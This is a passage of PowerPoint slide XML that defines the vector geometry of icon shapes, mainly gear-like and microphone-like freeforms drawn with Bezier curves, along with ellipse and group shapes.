                      <a:pt x="190" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="177" y="83"/>
                      <a:pt x="174" y="76"/>
                      <a:pt x="183" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="193" y="57"/>
                      <a:pt x="200" y="49"/>
                      <a:pt x="201" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="201" y="49"/>
                      <a:pt x="201" y="48"/>
                      <a:pt x="201" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="200" y="48"/>
                      <a:pt x="193" y="40"/>
                      <a:pt x="184" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="175" y="22"/>
                      <a:pt x="168" y="15"/>
                      <a:pt x="167" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="167" y="14"/>
                      <a:pt x="167" y="14"/>
                      <a:pt x="166" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="166" y="15"/>
                      <a:pt x="158" y="23"/>
                      <a:pt x="149" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="41"/>
                      <a:pt x="132" y="38"/>
                      <a:pt x="132" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="12"/>
                      <a:pt x="132" y="1"/>
                      <a:pt x="132" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="0"/>
                      <a:pt x="132" y="0"/>
                      <a:pt x="131" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="0"/>
                      <a:pt x="120" y="0"/>
                      <a:pt x="108" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="0"/>
                      <a:pt x="85" y="0"/>
                      <a:pt x="84" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="0"/>
                      <a:pt x="83" y="0"/>
                      <a:pt x="83" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="1"/>
                      <a:pt x="83" y="12"/>
                      <a:pt x="83" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="38"/>
                      <a:pt x="76" y="41"/>
                      <a:pt x="67" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="23"/>
                      <a:pt x="49" y="15"/>
                      <a:pt x="49" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="14"/>
                      <a:pt x="48" y="14"/>
                      <a:pt x="48" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="15"/>
                      <a:pt x="40" y="22"/>
                      <a:pt x="31" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="40"/>
                      <a:pt x="15" y="48"/>
                      <a:pt x="15" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="48"/>
                      <a:pt x="14" y="49"/>
                      <a:pt x="15" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="49"/>
                      <a:pt x="23" y="57"/>
                      <a:pt x="32" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="76"/>
                      <a:pt x="38" y="83"/>
                      <a:pt x="25" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="83"/>
                      <a:pt x="1" y="83"/>
                      <a:pt x="1" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="83"/>
                      <a:pt x="0" y="84"/>
                      <a:pt x="0" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="85"/>
                      <a:pt x="0" y="95"/>
                      <a:pt x="0" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="120"/>
                      <a:pt x="0" y="131"/>
                      <a:pt x="0" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="132"/>
                      <a:pt x="0" y="132"/>
                      <a:pt x="1" y="132"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="132"/>
                      <a:pt x="12" y="132"/>
                      <a:pt x="25" y="132"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="132"/>
                      <a:pt x="42" y="140"/>
                      <a:pt x="32" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="158"/>
                      <a:pt x="15" y="166"/>
                      <a:pt x="15" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="167"/>
                      <a:pt x="14" y="167"/>
                      <a:pt x="15" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="168"/>
                      <a:pt x="23" y="175"/>
                      <a:pt x="31" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="193"/>
                      <a:pt x="48" y="200"/>
                      <a:pt x="48" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="201"/>
                      <a:pt x="49" y="201"/>
                      <a:pt x="49" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="200"/>
                      <a:pt x="57" y="192"/>
                      <a:pt x="67" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="174"/>
                      <a:pt x="83" y="177"/>
                      <a:pt x="83" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="203"/>
                      <a:pt x="83" y="214"/>
                      <a:pt x="83" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="215"/>
                      <a:pt x="84" y="216"/>
                      <a:pt x="84" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="216"/>
                      <a:pt x="95" y="216"/>
                      <a:pt x="108" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="216"/>
                      <a:pt x="131" y="216"/>
                      <a:pt x="131" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="216"/>
                      <a:pt x="132" y="215"/>
                      <a:pt x="132" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="214"/>
                      <a:pt x="132" y="203"/>
                      <a:pt x="132" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="177"/>
                      <a:pt x="140" y="174"/>
                      <a:pt x="149" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="192"/>
                      <a:pt x="166" y="200"/>
                      <a:pt x="166" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="167" y="201"/>
                      <a:pt x="167" y="201"/>
                      <a:pt x="167" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="200"/>
                      <a:pt x="175" y="193"/>
                      <a:pt x="184" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="193" y="175"/>
                      <a:pt x="200" y="168"/>
                      <a:pt x="201" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="201" y="167"/>
                      <a:pt x="201" y="167"/>
                      <a:pt x="201" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="200" y="166"/>
                      <a:pt x="193" y="158"/>
                      <a:pt x="183" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="140"/>
                      <a:pt x="177" y="132"/>
                      <a:pt x="190" y="132"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="203" y="132"/>
                      <a:pt x="215" y="132"/>
                      <a:pt x="215" y="132"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="215" y="132"/>
                      <a:pt x="216" y="132"/>
                      <a:pt x="216" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="216" y="131"/>
                      <a:pt x="216" y="120"/>
                      <a:pt x="216" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="216" y="95"/>
                      <a:pt x="216" y="85"/>
                      <a:pt x="216" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="216" y="84"/>
                      <a:pt x="215" y="83"/>
                      <a:pt x="215" y="83"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="109" y="143"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="143"/>
                      <a:pt x="73" y="127"/>
                      <a:pt x="73" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="87"/>
                      <a:pt x="89" y="71"/>
                      <a:pt x="109" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="129" y="71"/>
                      <a:pt x="146" y="87"/>
                      <a:pt x="146" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="127"/>
                      <a:pt x="129" y="143"/>
                      <a:pt x="109" y="14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5" name="Freeform 71"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5834063" y="5959475"/>
                <a:ext cx="76200" cy="74612"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 107 w 108"/>
                  <a:gd name="T1" fmla="*/ 41 h 107"/>
                  <a:gd name="T2" fmla="*/ 95 w 108"/>
                  <a:gd name="T3" fmla="*/ 41 h 107"/>
                  <a:gd name="T4" fmla="*/ 92 w 108"/>
                  <a:gd name="T5" fmla="*/ 33 h 107"/>
                  <a:gd name="T6" fmla="*/ 100 w 108"/>
                  <a:gd name="T7" fmla="*/ 24 h 107"/>
                  <a:gd name="T8" fmla="*/ 100 w 108"/>
                  <a:gd name="T9" fmla="*/ 24 h 107"/>
                  <a:gd name="T10" fmla="*/ 92 w 108"/>
                  <a:gd name="T11" fmla="*/ 15 h 107"/>
                  <a:gd name="T12" fmla="*/ 84 w 108"/>
                  <a:gd name="T13" fmla="*/ 7 h 107"/>
                  <a:gd name="T14" fmla="*/ 83 w 108"/>
                  <a:gd name="T15" fmla="*/ 7 h 107"/>
                  <a:gd name="T16" fmla="*/ 74 w 108"/>
                  <a:gd name="T17" fmla="*/ 16 h 107"/>
                  <a:gd name="T18" fmla="*/ 66 w 108"/>
                  <a:gd name="T19" fmla="*/ 12 h 107"/>
                  <a:gd name="T20" fmla="*/ 66 w 108"/>
                  <a:gd name="T21" fmla="*/ 0 h 107"/>
                  <a:gd name="T22" fmla="*/ 66 w 108"/>
                  <a:gd name="T23" fmla="*/ 0 h 107"/>
                  <a:gd name="T24" fmla="*/ 54 w 108"/>
                  <a:gd name="T25" fmla="*/ 0 h 107"/>
                  <a:gd name="T26" fmla="*/ 42 w 108"/>
                  <a:gd name="T27" fmla="*/ 0 h 107"/>
                  <a:gd name="T28" fmla="*/ 42 w 108"/>
                  <a:gd name="T29" fmla="*/ 0 h 107"/>
                  <a:gd name="T30" fmla="*/ 42 w 108"/>
                  <a:gd name="T31" fmla="*/ 12 h 107"/>
                  <a:gd name="T32" fmla="*/ 33 w 108"/>
                  <a:gd name="T33" fmla="*/ 16 h 107"/>
                  <a:gd name="T34" fmla="*/ 25 w 108"/>
                  <a:gd name="T35" fmla="*/ 7 h 107"/>
                  <a:gd name="T36" fmla="*/ 24 w 108"/>
                  <a:gd name="T37" fmla="*/ 7 h 107"/>
                  <a:gd name="T38" fmla="*/ 16 w 108"/>
                  <a:gd name="T39" fmla="*/ 15 h 107"/>
                  <a:gd name="T40" fmla="*/ 7 w 108"/>
                  <a:gd name="T41" fmla="*/ 24 h 107"/>
                  <a:gd name="T42" fmla="*/ 7 w 108"/>
                  <a:gd name="T43" fmla="*/ 24 h 107"/>
                  <a:gd name="T44" fmla="*/ 16 w 108"/>
                  <a:gd name="T45" fmla="*/ 33 h 107"/>
                  <a:gd name="T46" fmla="*/ 13 w 108"/>
                  <a:gd name="T47" fmla="*/ 41 h 107"/>
                  <a:gd name="T48" fmla="*/ 0 w 108"/>
                  <a:gd name="T49" fmla="*/ 41 h 107"/>
                  <a:gd name="T50" fmla="*/ 0 w 108"/>
                  <a:gd name="T51" fmla="*/ 42 h 107"/>
                  <a:gd name="T52" fmla="*/ 0 w 108"/>
                  <a:gd name="T53" fmla="*/ 54 h 107"/>
                  <a:gd name="T54" fmla="*/ 0 w 108"/>
                  <a:gd name="T55" fmla="*/ 65 h 107"/>
                  <a:gd name="T56" fmla="*/ 0 w 108"/>
                  <a:gd name="T57" fmla="*/ 66 h 107"/>
                  <a:gd name="T58" fmla="*/ 13 w 108"/>
                  <a:gd name="T59" fmla="*/ 66 h 107"/>
                  <a:gd name="T60" fmla="*/ 16 w 108"/>
                  <a:gd name="T61" fmla="*/ 74 h 107"/>
                  <a:gd name="T62" fmla="*/ 7 w 108"/>
                  <a:gd name="T63" fmla="*/ 83 h 107"/>
                  <a:gd name="T64" fmla="*/ 7 w 108"/>
                  <a:gd name="T65" fmla="*/ 83 h 107"/>
                  <a:gd name="T66" fmla="*/ 16 w 108"/>
                  <a:gd name="T67" fmla="*/ 92 h 107"/>
                  <a:gd name="T68" fmla="*/ 24 w 108"/>
                  <a:gd name="T69" fmla="*/ 100 h 107"/>
                  <a:gd name="T70" fmla="*/ 25 w 108"/>
                  <a:gd name="T71" fmla="*/ 100 h 107"/>
                  <a:gd name="T72" fmla="*/ 33 w 108"/>
                  <a:gd name="T73" fmla="*/ 91 h 107"/>
                  <a:gd name="T74" fmla="*/ 42 w 108"/>
                  <a:gd name="T75" fmla="*/ 95 h 107"/>
                  <a:gd name="T76" fmla="*/ 42 w 108"/>
                  <a:gd name="T77" fmla="*/ 107 h 107"/>
                  <a:gd name="T78" fmla="*/ 42 w 108"/>
                  <a:gd name="T79" fmla="*/ 107 h 107"/>
                  <a:gd name="T80" fmla="*/ 54 w 108"/>
                  <a:gd name="T81" fmla="*/ 107 h 107"/>
                  <a:gd name="T82" fmla="*/ 66 w 108"/>
                  <a:gd name="T83" fmla="*/ 107 h 107"/>
                  <a:gd name="T84" fmla="*/ 66 w 108"/>
                  <a:gd name="T85" fmla="*/ 107 h 107"/>
                  <a:gd name="T86" fmla="*/ 66 w 108"/>
                  <a:gd name="T87" fmla="*/ 95 h 107"/>
                  <a:gd name="T88" fmla="*/ 74 w 108"/>
                  <a:gd name="T89" fmla="*/ 91 h 107"/>
                  <a:gd name="T90" fmla="*/ 83 w 108"/>
                  <a:gd name="T91" fmla="*/ 100 h 107"/>
                  <a:gd name="T92" fmla="*/ 84 w 108"/>
                  <a:gd name="T93" fmla="*/ 100 h 107"/>
                  <a:gd name="T94" fmla="*/ 92 w 108"/>
                  <a:gd name="T95" fmla="*/ 92 h 107"/>
                  <a:gd name="T96" fmla="*/ 100 w 108"/>
                  <a:gd name="T97" fmla="*/ 83 h 107"/>
                  <a:gd name="T98" fmla="*/ 100 w 108"/>
                  <a:gd name="T99" fmla="*/ 83 h 107"/>
                  <a:gd name="T100" fmla="*/ 92 w 108"/>
                  <a:gd name="T101" fmla="*/ 74 h 107"/>
                  <a:gd name="T102" fmla="*/ 95 w 108"/>
                  <a:gd name="T103" fmla="*/ 66 h 107"/>
                  <a:gd name="T104" fmla="*/ 107 w 108"/>
                  <a:gd name="T105" fmla="*/ 66 h 107"/>
                  <a:gd name="T106" fmla="*/ 108 w 108"/>
                  <a:gd name="T107" fmla="*/ 65 h 107"/>
                  <a:gd name="T108" fmla="*/ 108 w 108"/>
                  <a:gd name="T109" fmla="*/ 54 h 107"/>
                  <a:gd name="T110" fmla="*/ 108 w 108"/>
                  <a:gd name="T111" fmla="*/ 42 h 107"/>
                  <a:gd name="T112" fmla="*/ 107 w 108"/>
                  <a:gd name="T113" fmla="*/ 41 h 107"/>
                  <a:gd name="T114" fmla="*/ 67 w 108"/>
                  <a:gd name="T115" fmla="*/ 67 h 107"/>
                  <a:gd name="T116" fmla="*/ 42 w 108"/>
                  <a:gd name="T117" fmla="*/ 67 h 107"/>
                  <a:gd name="T118" fmla="*/ 42 w 108"/>
                  <a:gd name="T119" fmla="*/ 41 h 107"/>
                  <a:gd name="T120" fmla="*/ 67 w 108"/>
                  <a:gd name="T121" fmla="*/ 41 h 107"/>
                  <a:gd name="T122" fmla="*/ 67 w 108"/>
                  <a:gd name="T123" fmla="*/ 6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8" h="107">
                    <a:moveTo>
                      <a:pt x="107" y="41"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="41"/>
                      <a:pt x="102" y="41"/>
                      <a:pt x="95" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="41"/>
                      <a:pt x="87" y="38"/>
                      <a:pt x="92" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="28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96" y="20"/>
                      <a:pt x="92" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="11"/>
                      <a:pt x="84" y="7"/>
                      <a:pt x="84" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="7"/>
                      <a:pt x="83" y="7"/>
                      <a:pt x="83" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="7"/>
                      <a:pt x="79" y="11"/>
                      <a:pt x="74" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="20"/>
                      <a:pt x="66" y="19"/>
                      <a:pt x="66" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="6"/>
                      <a:pt x="66" y="0"/>
                      <a:pt x="66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5" y="0"/>
                      <a:pt x="60" y="0"/>
                      <a:pt x="54" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48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6"/>
                      <a:pt x="42" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="19"/>
                      <a:pt x="38" y="20"/>
                      <a:pt x="33" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="11"/>
                      <a:pt x="25" y="7"/>
                      <a:pt x="25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0" y="11"/>
                      <a:pt x="16" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="20"/>
                      <a:pt x="8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11" y="28"/>
                      <a:pt x="16" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="38"/>
                      <a:pt x="19" y="41"/>
                      <a:pt x="13" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="41"/>
                      <a:pt x="1" y="41"/>
                      <a:pt x="0" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="41"/>
                      <a:pt x="0" y="42"/>
                      <a:pt x="0" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="42"/>
                      <a:pt x="0" y="47"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="60"/>
                      <a:pt x="0" y="65"/>
                      <a:pt x="0" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="65"/>
                      <a:pt x="0" y="66"/>
                      <a:pt x="0" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="66"/>
                      <a:pt x="6" y="66"/>
                      <a:pt x="13" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="66"/>
                      <a:pt x="21" y="69"/>
                      <a:pt x="16" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="79"/>
                      <a:pt x="8" y="83"/>
                      <a:pt x="7" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="83"/>
                      <a:pt x="7" y="83"/>
                      <a:pt x="7" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="83"/>
                      <a:pt x="11" y="87"/>
                      <a:pt x="16" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="96"/>
                      <a:pt x="24" y="100"/>
                      <a:pt x="24" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="100"/>
                      <a:pt x="24" y="100"/>
                      <a:pt x="25" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="100"/>
                      <a:pt x="29" y="96"/>
                      <a:pt x="33" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="87"/>
                      <a:pt x="42" y="88"/>
                      <a:pt x="42" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="101"/>
                      <a:pt x="42" y="107"/>
                      <a:pt x="42" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="107"/>
                      <a:pt x="42" y="107"/>
                      <a:pt x="42" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="107"/>
                      <a:pt x="48" y="107"/>
                      <a:pt x="54" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="107"/>
                      <a:pt x="65" y="107"/>
                      <a:pt x="66" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="107"/>
                      <a:pt x="66" y="107"/>
                      <a:pt x="66" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="107"/>
                      <a:pt x="66" y="101"/>
                      <a:pt x="66" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="88"/>
                      <a:pt x="70" y="87"/>
                      <a:pt x="74" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="96"/>
                      <a:pt x="83" y="100"/>
                      <a:pt x="83" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="100"/>
                      <a:pt x="84" y="100"/>
                      <a:pt x="84" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="100"/>
                      <a:pt x="88" y="96"/>
                      <a:pt x="92" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="87"/>
                      <a:pt x="100" y="83"/>
                      <a:pt x="100" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="83"/>
                      <a:pt x="100" y="83"/>
                      <a:pt x="100" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="83"/>
                      <a:pt x="96" y="79"/>
                      <a:pt x="92" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="69"/>
                      <a:pt x="88" y="66"/>
                      <a:pt x="95" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="66"/>
                      <a:pt x="107" y="66"/>
                      <a:pt x="107" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="66"/>
                      <a:pt x="108" y="65"/>
                      <a:pt x="108" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="65"/>
                      <a:pt x="108" y="60"/>
                      <a:pt x="108" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="47"/>
                      <a:pt x="108" y="42"/>
                      <a:pt x="108" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="42"/>
                      <a:pt x="108" y="41"/>
                      <a:pt x="107" y="41"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="67" y="67"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="74"/>
                      <a:pt x="49" y="74"/>
                      <a:pt x="42" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="60"/>
                      <a:pt x="35" y="48"/>
                      <a:pt x="42" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="34"/>
                      <a:pt x="60" y="34"/>
                      <a:pt x="67" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="48"/>
                      <a:pt x="75" y="60"/>
                      <a:pt x="67" y="6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13" name="椭圆 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4576741" y="3402931"/>
              <a:ext cx="624974" cy="624974"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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6" name="组合 43"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="761141" y="3173851"/>
            <a:ext cx="634909" cy="634908"/>
            <a:chOff x="4562603" y="4162918"/>
            <a:chExt cx="624974" cy="624974"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="椭圆 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4562603" y="4162918"/>
              <a:ext cx="624974" cy="624974"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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777024" y="4314952"/>
              <a:ext cx="220204" cy="355078"/>
              <a:chOff x="6967538" y="6365875"/>
              <a:chExt cx="127000" cy="204787"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2" name="Freeform 626"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6967538" y="6423025"/>
                <a:ext cx="127000" cy="147637"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 180 w 180"/>
                  <a:gd name="T1" fmla="*/ 68 h 209"/>
                  <a:gd name="T2" fmla="*/ 180 w 180"/>
                  <a:gd name="T3" fmla="*/ 15 h 209"/>
                  <a:gd name="T4" fmla="*/ 156 w 180"/>
                  <a:gd name="T5" fmla="*/ 15 h 209"/>
                  <a:gd name="T6" fmla="*/ 156 w 180"/>
                  <a:gd name="T7" fmla="*/ 68 h 209"/>
                  <a:gd name="T8" fmla="*/ 92 w 180"/>
                  <a:gd name="T9" fmla="*/ 132 h 209"/>
                  <a:gd name="T10" fmla="*/ 91 w 180"/>
                  <a:gd name="T11" fmla="*/ 132 h 209"/>
                  <a:gd name="T12" fmla="*/ 90 w 180"/>
                  <a:gd name="T13" fmla="*/ 132 h 209"/>
                  <a:gd name="T14" fmla="*/ 90 w 180"/>
                  <a:gd name="T15" fmla="*/ 132 h 209"/>
                  <a:gd name="T16" fmla="*/ 89 w 180"/>
                  <a:gd name="T17" fmla="*/ 132 h 209"/>
                  <a:gd name="T18" fmla="*/ 24 w 180"/>
                  <a:gd name="T19" fmla="*/ 68 h 209"/>
                  <a:gd name="T20" fmla="*/ 24 w 180"/>
                  <a:gd name="T21" fmla="*/ 15 h 209"/>
                  <a:gd name="T22" fmla="*/ 0 w 180"/>
                  <a:gd name="T23" fmla="*/ 15 h 209"/>
                  <a:gd name="T24" fmla="*/ 0 w 180"/>
                  <a:gd name="T25" fmla="*/ 68 h 209"/>
                  <a:gd name="T26" fmla="*/ 76 w 180"/>
                  <a:gd name="T27" fmla="*/ 156 h 209"/>
                  <a:gd name="T28" fmla="*/ 76 w 180"/>
                  <a:gd name="T29" fmla="*/ 194 h 209"/>
                  <a:gd name="T30" fmla="*/ 22 w 180"/>
                  <a:gd name="T31" fmla="*/ 209 h 209"/>
                  <a:gd name="T32" fmla="*/ 159 w 180"/>
                  <a:gd name="T33" fmla="*/ 209 h 209"/>
                  <a:gd name="T34" fmla="*/ 104 w 180"/>
                  <a:gd name="T35" fmla="*/ 193 h 209"/>
                  <a:gd name="T36" fmla="*/ 104 w 180"/>
                  <a:gd name="T37" fmla="*/ 156 h 209"/>
                  <a:gd name="T38" fmla="*/ 180 w 180"/>
                  <a:gd name="T39" fmla="*/ 6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0" h="209">
                    <a:moveTo>
                      <a:pt x="180" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="180" y="68"/>
                      <a:pt x="180" y="38"/>
                      <a:pt x="180" y="15"/>
                    </a:cubicBezTo>
